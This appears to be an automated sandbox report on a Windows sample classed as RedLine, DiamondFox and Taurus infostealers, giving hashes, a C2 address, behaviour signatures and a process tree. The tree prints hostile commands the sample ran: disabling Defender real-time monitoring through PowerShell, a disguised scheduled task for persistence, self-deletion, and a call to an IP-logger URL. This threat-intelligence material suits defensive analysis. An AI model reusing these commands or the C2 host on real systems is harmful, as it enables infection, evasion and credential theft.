Overview

overview

10

Static

static

33815ECF51...36.exe

windows7_x64

10

33815ECF51...36.exe

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    07-06-2021 06:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    33815ECF51B4A2F18811FBA9ED999D36.exe

  • Size

    2.5MB

  • MD5

    33815ecf51b4a2f18811fba9ed999d36

  • SHA1

    709cde4326af52f644cf00d260af65bdd0cbf5e1

  • SHA256

    2f76ea148491b558111e852ce708f8802896c21c3b18239d14078f313822e301

  • SHA512

    d3e1669d4e60d180a9bcd6b87f2c376be69bb7bebf6a73f0503ab65e4770354b71adcfc0688444ccf9a4d57fff32542f29bbcf12bc9686f347fa8ae8eaac82f5

Score
10/10
diamondfoxredlinetaurus002botnetdiscoveryinfostealerpersistencespywarestealertrojan

Malware Config

Extracted

Family

redline

Botnet

002

C2

piporopopo.com:54367

Signatures

  • DiamondFox

    DiamondFox is a multipurpose botnet with many capabilities.

    botnetstealerdiamondfox
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • Taurus Stealer

    Taurus is an infostealer first seen in June 2020.

    trojanstealertaurus
  • Taurus Stealer Payload 1 IoCs
  • DiamondFox payload 2 IoCs

    Detects DiamondFox payload in file/memory.

  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Adds Run key to start application
    • Checks processor information in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1180
    • C:\Users\Admin\AppData\Local\Temp\33815ECF51B4A2F18811FBA9ED999D36.exe
      "C:\Users\Admin\AppData\Local\Temp\33815ECF51B4A2F18811FBA9ED999D36.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:344
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/2E9wY5
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:840
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:840 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1448
      • C:\Users\Admin\AppData\Roaming\Control.dll
        "C:\Users\Admin\AppData\Roaming\Control.dll" -s -psfgvedfsbetdfhgbefsdtgretgdhdgersfhbetfsgrsfhasgsdg
        3⤵
        • Executes dropped EXE
        PID:1208
      • C:\Users\Admin\AppData\Roaming\curl.dll
        "C:\Users\Admin\AppData\Roaming\curl.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
        3⤵
        • Executes dropped EXE
        PID:1356
      • C:\Users\Admin\AppData\Roaming\autorun.dll
        "C:\Users\Admin\AppData\Roaming\autorun.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1628
        • C:\Users\Admin\AppData\Roaming\autorun.exe
          "C:\Users\Admin\AppData\Roaming\autorun.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of UnmapMainImage
          PID:268
      • C:\Users\Admin\AppData\Roaming\sistemes.dll
        "C:\Users\Admin\AppData\Roaming\sistemes.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:552
        • C:\Users\Admin\AppData\Roaming\sistemes.exe
          "C:\Users\Admin\AppData\Roaming\sistemes.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of UnmapMainImage
          • Suspicious use of WriteProcessMemory
          PID:324
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /tn Windows\MicrosoftVisualStudio /tr "C:\ProgramData\Microsoft Visual Studio\getmac.exe" /st 00:00 /sc once /du 9999:59 /ri 1 /f
            5⤵
            • Creates scheduled task(s)
            PID:1968
      • C:\Users\Admin\AppData\Roaming\laun.dll
        "C:\Users\Admin\AppData\Roaming\laun.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1568
        • C:\Users\Admin\AppData\Roaming\laun.exe
          "C:\Users\Admin\AppData\Roaming\laun.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of UnmapMainImage
          • Suspicious use of WriteProcessMemory
          PID:1072
      • C:\Users\Admin\AppData\Roaming\der.dll
        "C:\Users\Admin\AppData\Roaming\der.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Users\Admin\AppData\Roaming\der.exe
          "C:\Users\Admin\AppData\Roaming\der.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of UnmapMainImage
          PID:664
          • C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
            "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of UnmapMainImage
            PID:2396
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2428
      • C:\Users\Admin\AppData\Roaming\Tausuus.dll
        "C:\Users\Admin\AppData\Roaming\Tausuus.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:688
        • C:\Users\Admin\AppData\Roaming\Tausuus.exe
          "C:\Users\Admin\AppData\Roaming\Tausuus.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of UnmapMainImage
          PID:420
          • C:\Windows\SysWOW64\cmd.exe
            /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\Tausuus.exe
            5⤵
              PID:2844
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 3
                6⤵
                • Delays execution with timeout.exe
                PID:2876
        • C:\Users\Admin\AppData\Roaming\red.dll
          "C:\Users\Admin\AppData\Roaming\red.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1556
          • C:\Users\Admin\AppData\Roaming\red.exe
            "C:\Users\Admin\AppData\Roaming\red.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of UnmapMainImage
            PID:432
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {2A3601AD-2465-45DA-AE0F-AF0BEC2E235C} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
      1⤵
        PID:2972

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/268-92-0x0000000000320000-0x0000000000321000-memory.dmp

        Filesize

        4KB

        Download

      • memory/268-93-0x0000000000400000-0x0000000000617000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/324-108-0x0000000000400000-0x0000000000628000-memory.dmp

        Filesize

        2.2MB

        Download

      • memory/344-60-0x0000000075211000-0x0000000075213000-memory.dmp

        Filesize

        8KB

        Download

      • memory/420-161-0x0000000000400000-0x0000000000646000-memory.dmp

        Filesize

        2.3MB

        Download

      • memory/432-167-0x0000000004B62000-0x0000000004B63000-memory.dmp

        Filesize

        4KB

        Download

      • memory/432-163-0x0000000000400000-0x000000000063B000-memory.dmp

        Filesize

        2.2MB

        Download

      • memory/432-184-0x0000000004B64000-0x0000000004B66000-memory.dmp

        Filesize

        8KB

        Download

      • memory/432-166-0x0000000004B61000-0x0000000004B62000-memory.dmp

        Filesize

        4KB

        Download

      • memory/432-168-0x0000000004B63000-0x0000000004B64000-memory.dmp

        Filesize

        4KB

        Download

      • memory/432-165-0x0000000000620000-0x0000000000639000-memory.dmp

        Filesize

        100KB

        Download

      • memory/432-169-0x0000000000770000-0x0000000000787000-memory.dmp

        Filesize

        92KB

        Download

      • memory/664-140-0x0000000000400000-0x0000000000641000-memory.dmp

        Filesize

        2.3MB

        Download

      • memory/840-62-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1072-125-0x0000000000320000-0x0000000000321000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1072-124-0x0000000000400000-0x0000000000635000-memory.dmp

        Filesize

        2.2MB

        Download

      • memory/1180-126-0x00000000029F0000-0x0000000002A05000-memory.dmp

        Filesize

        84KB

        Download

      • memory/2396-180-0x0000000000400000-0x0000000000641000-memory.dmp

        Filesize

        2.3MB

        Download

      • memory/2428-203-0x000000007EF30000-0x000000007EF31000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-181-0x0000000004A90000-0x0000000004A91000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-185-0x0000000001210000-0x0000000001211000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-186-0x0000000004A20000-0x0000000004A21000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-189-0x0000000005690000-0x0000000005691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-194-0x0000000006090000-0x0000000006091000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-195-0x00000000061A0000-0x00000000061A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-202-0x0000000006240000-0x0000000006241000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-182-0x0000000004A92000-0x0000000004A93000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-204-0x0000000005610000-0x0000000005611000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-218-0x0000000006300000-0x0000000006301000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-219-0x0000000006310000-0x0000000006311000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-177-0x00000000010A0000-0x00000000010A1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2428-178-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

        Filesize

        4KB

        Download